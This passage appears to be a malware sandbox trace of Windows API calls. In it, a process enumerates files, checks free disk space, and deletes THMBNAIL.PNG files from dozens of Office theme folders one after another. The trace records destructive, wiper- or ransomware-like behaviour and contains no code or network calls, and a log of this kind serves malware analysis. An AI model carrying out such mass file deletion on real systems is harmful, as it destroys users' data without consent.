ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x254, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOLDSTRI.INF", cAlternateFileName="")) returned 1 [0053.993] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xd97, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.993] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7c5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0053.993] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0053.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0053.999] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 1 [0054.001] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.001] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.001] CoTaskMemFree (pv=0x4e1c10) [0054.003] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.010] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 1 [0054.012] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.012] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.012] CoTaskMemFree (pv=0x4e1c10) [0054.014] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.019] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 1 [0054.021] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.021] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.021] CoTaskMemFree (pv=0x4e1c10) [0054.022] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.030] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 1 [0054.033] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.033] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.033] CoTaskMemFree (pv=0x4e1c10) [0054.034] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.039] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 1 [0054.041] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.041] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.041] CoTaskMemFree (pv=0x4e1c10) [0054.042] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.048] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.048] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 1 [0054.050] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.050] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.050] CoTaskMemFree (pv=0x4e1c10) [0054.050] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.056] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 1 [0054.058] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.058] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.058] CoTaskMemFree (pv=0x4e1c10) [0054.060] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.066] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 1 [0054.068] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.068] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.068] CoTaskMemFree (pv=0x4e1c10) [0054.069] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.081] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.081] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 1 [0054.083] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.083] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.083] CoTaskMemFree (pv=0x4e1c10) [0054.084] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.092] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 1 [0054.094] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.094] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.094] CoTaskMemFree (pv=0x4e1c10) [0054.095] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.101] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 1 [0054.109] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.109] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.109] CoTaskMemFree (pv=0x4e1c10) [0054.131] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.137] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.137] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 1 [0054.139] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.139] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.139] CoTaskMemFree (pv=0x4e1c10) [0054.140] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.147] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 1 [0054.149] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.149] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.149] CoTaskMemFree (pv=0x4e1c10) [0054.150] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.158] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 1 [0054.160] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.160] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.160] CoTaskMemFree (pv=0x4e1c10) [0054.161] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.168] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 1 [0054.170] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.170] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.170] CoTaskMemFree (pv=0x4e1c10) [0054.170] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.175] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 1 [0054.177] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.177] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.177] CoTaskMemFree (pv=0x4e1c10) [0054.179] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.184] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 1 [0054.186] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.186] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.186] CoTaskMemFree (pv=0x4e1c10) [0054.187] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.194] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.194] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 1 [0054.196] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.196] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.196] CoTaskMemFree (pv=0x4e1c10) [0054.198] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.205] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 1 [0054.207] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.207] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.207] CoTaskMemFree (pv=0x4e1c10) [0054.208] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.212] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.212] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 1 [0054.214] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.214] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.214] CoTaskMemFree (pv=0x4e1c10) [0054.215] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.224] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 1 [0054.226] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.226] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.226] CoTaskMemFree (pv=0x4e1c10) [0054.227] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.232] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 1 [0054.234] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.234] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.235] CoTaskMemFree (pv=0x4e1c10) [0054.235] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.243] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 1 [0054.245] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.245] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.245] CoTaskMemFree (pv=0x4e1c10) [0054.246] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.252] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 1 [0054.254] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.254] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.255] CoTaskMemFree (pv=0x4e1c10) [0054.256] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.261] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 1 [0054.265] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.265] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.265] CoTaskMemFree (pv=0x4e1c10) [0054.265] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.271] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 1 [0054.273] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.273] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.273] CoTaskMemFree (pv=0x4e1c10) [0054.274] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0054.281] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 1 [0054.283] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 